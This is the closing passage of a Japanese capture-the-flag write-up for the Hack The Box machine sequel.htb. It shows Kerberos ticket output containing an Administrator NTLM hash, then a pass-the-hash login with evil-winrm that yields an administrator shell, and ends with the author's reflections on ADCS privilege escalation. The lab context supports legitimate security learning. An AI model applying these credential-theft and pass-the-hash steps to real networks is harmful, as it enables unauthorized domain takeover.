BwMFAADhAAClERgPMjAyMzAzMTAyMjQxMjhaphEYDzIwMjMwMzExMDg0MTI4WqcRGA8yMDIzMDMxNzIy
NDEyOFqoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 3/10/2023 2:41:28 PM
EndTime : 3/11/2023 12:41:28 AM
RenewTill : 3/17/2023 3:41:28 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : Wf9EVe7qOzVwS437MezNWw==
ASREP (key) : 2F742C96C3B9FBDD084FF2EE74D5E645
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
NTLMハッシュがわかったのでこのハッシュを用いてPTH攻撃を実施する。
┌──(root㉿kali)-[~/work]
└─# evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
よっしゃ!!管理者権限を奪取できました!!
まとめ
これで特権昇格に成功し、Administrator権限を奪取できました。
ADCSにたどり着くまでの道のりが長かったのと、ADCSの調査自体も難しかったのでいい勉強になりました。
PowerlessとwinPEASで見つけられなかった時のことを考えとかないといけないなと思いました。
今回もセキュリティエンジニアの皆さんの助けになればなと思います。